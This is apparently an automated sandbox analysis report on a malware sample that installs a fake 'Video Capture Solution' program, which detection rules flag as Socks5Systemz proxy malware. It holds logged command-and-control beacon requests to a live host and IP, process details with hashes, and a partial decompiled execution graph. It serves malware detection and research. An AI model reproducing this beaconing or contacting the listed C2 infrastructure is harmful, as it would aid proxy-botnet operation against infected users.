Dec 16, 2024 14:53:43.040669918 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:44.551151037 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:44 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49858 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:44.791974068 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:46.194381952 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:45 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49861 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:46.432416916 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:47.807670116 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:47 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49865 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:48.040822983 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:49.453177929 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Dec 16, 2024 14:53:49.561417103 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:50.052721024 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:49 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49870 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:50.291291952 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:51.727293015 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:51 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49876 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:51.962718964 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:53.322369099 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:53 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49881 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:53.557111025 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:54.934684038 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Dec 16, 2024 14:53:55.045795918 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:55.522017002 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49887 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:55.759183884 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:57.107979059 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20
Dec 16, 2024 14:53:57.218097925 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:57.706929922 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:57 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49894 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:57.948272943 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:53:59.333841085 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:53:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49897 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:53:59.572628021 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
    Host: ejvphud.ua
    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:54:00.963429928 CET | 220 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Mon, 16 Dec 2024 13:54:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.4.33
    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
    Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49901 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:54:01.198599100 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:54:02.553124905 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:54:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49907 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:54:03.299094915 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:54:04.619347095 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:54:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49913 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:54:04.857968092 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:54:06.313155890 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:54:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49917 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:54:06.560362101 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:54:07.976918936 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:54:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49922 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:54:08.623197079 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:54:10.024416924 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:54:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49926 | 147.45.126.31 | 80 | 7156 | C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 14:54:10.264815092 CET | 325 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e8938e4a855a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b410e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ec91993eca6e9e10 HTTP/1.1
Host: ejvphud.ua
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 16, 2024 14:54:11.688627958 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 16 Dec 2024 13:54:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                        Target ID:0
                                                        Start time:08:52:03
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\AbC0LBkVhr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\AbC0LBkVhr.exe"
                                                        Imagebase:0x400000
                                                        File size:3'774'004 bytes
                                                        MD5 hash:038C7D5697BFBE553717357809E621BF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:1
                                                        Start time:08:52:03
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-QBRS4.tmp\AbC0LBkVhr.tmp" /SL5="$20416,3526895,54272,C:\Users\user\Desktop\AbC0LBkVhr.exe"
                                                        Imagebase:0x400000
                                                        File size:704'000 bytes
                                                        MD5 hash:2A520A4553D90F23218A97B9476D232A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2974303192.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 4%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:2
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Windows\SysWOW64\net.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\net.exe" pause video_capture_solution_11223
                                                        Imagebase:0x530000
                                                        File size:47'104 bytes
                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe" -i
                                                        Imagebase:0x400000
                                                        File size:3'281'038 bytes
                                                        MD5 hash:F980DB1C4941DE93EA4A88045D20F6D5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1722687638.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.2974350816.0000000002D09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Video Capture Solution 1.33\videocapturesolution32.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 79%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:08:52:04
                                                        Start date:16/12/2024
                                                        Path:C:\Windows\SysWOW64\net1.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\system32\net1 pause video_capture_solution_11223
                                                        Imagebase:0x5d0000
                                                        File size:139'776 bytes
                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                          Execution Graph

                                                          Execution Coverage:21%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:2.4%
                                                          Total number of Nodes:1498
                                                          Total number of Limit Nodes:22
                                                          execution_graph 4986 409c40 5027 4030dc 4986->5027 4988 409c56 5030 4042e8 4988->5030 4990 409c5b 5033 40457c GetModuleHandleA GetProcAddress 4990->5033 4996 409c6a 5050 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4996->5050 5013 409d43 5112 4074a0 5013->5112 5015 409d05 5015->5013 5145 409aa0 5015->5145 5016 409d84 5116 407a28 5016->5116 5017 409d69 5017->5016 5018 409aa0 4 API calls 5017->5018 5018->5016 5020 409da9 5126 408b08 5020->5126 5024 409def 5025 408b08 21 API calls 5024->5025 5026 409e28 5024->5026 5025->5024 5155 403094 5027->5155 5029 4030e1 GetModuleHandleA GetCommandLineA 5029->4988 5032 404323 5030->5032 5156 403154 5030->5156 5032->4990 5034 404598 5033->5034 5035 40459f GetProcAddress 5033->5035 5034->5035 5036 4045b5 GetProcAddress 5035->5036 5037 4045ae 5035->5037 5038 4045c4 SetProcessDEPPolicy 5036->5038 5039 4045c8 5036->5039 5037->5036 5038->5039 5040 4065b8 5039->5040 5169 405c98 5040->5169 5049 406604 6F551CD0 5049->4996 5051 4090f7 5050->5051 5296 406fa0 SetErrorMode 5051->5296 5056 403198 4 API calls 5057 40913c 5056->5057 5058 409b30 GetSystemInfo VirtualQuery 5057->5058 5059 409be4 5058->5059 5062 409b5a 5058->5062 5064 409768 5059->5064 5060 409bc5 VirtualQuery 5060->5059 5060->5062 5061 409b84 VirtualProtect 5061->5062 5062->5059 5062->5060 5062->5061 5063 409bb3 VirtualProtect 5062->5063 5063->5060 5306 406bd0 GetCommandLineA 5064->5306 5066 409825 5068 4031b8 4 API calls 5066->5068 5067 406c2c 6 API calls 5071 409785 5067->5071 5069 40983f 5068->5069 5072 406c2c 5069->5072 5070 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5070->5071 5071->5066 5071->5067 5071->5070 5073 406c53 GetModuleFileNameA 5072->5073 5074 406c77 GetCommandLineA 5072->5074 5075 403278 4 API calls 5073->5075 5076 406c7c 5074->5076 5077 406c75 5075->5077 5078 406c81 5076->5078 5079 406af0 4 API calls 5076->5079 5082 406c89 5076->5082 5080 406ca4 5077->5080 5081 403198 
4 API calls 5078->5081 5079->5076 5083 403198 4 API calls 5080->5083 5081->5082 5084 40322c 4 API calls 5082->5084 5085 406cb9 5083->5085 5084->5080 5086 4031e8 5085->5086 5087 4031ec 5086->5087 5090 4031fc 5086->5090 5089 403254 4 API calls 5087->5089 5087->5090 5088 403228 5092 4074e0 5088->5092 5089->5090 5090->5088 5091 4025ac 4 API calls 5090->5091 5091->5088 5093 4074ea 5092->5093 5327 407576 5093->5327 5330 407578 5093->5330 5094 407516 5095 40752a 5094->5095 5333 40748c GetLastError 5094->5333 5099 409bec FindResourceA 5095->5099 5100 409c01 5099->5100 5101 409c06 SizeofResource 5099->5101 5102 409aa0 4 API calls 5100->5102 5103 409c13 5101->5103 5104 409c18 LoadResource 5101->5104 5102->5101 5105 409aa0 4 API calls 5103->5105 5106 409c26 5104->5106 5107 409c2b LockResource 5104->5107 5105->5104 5108 409aa0 4 API calls 5106->5108 5109 409c37 5107->5109 5110 409c3c 5107->5110 5108->5107 5111 409aa0 4 API calls 5109->5111 5110->5015 5142 407918 5110->5142 5111->5110 5113 4074b4 5112->5113 5114 4074c4 5113->5114 5115 4073ec 20 API calls 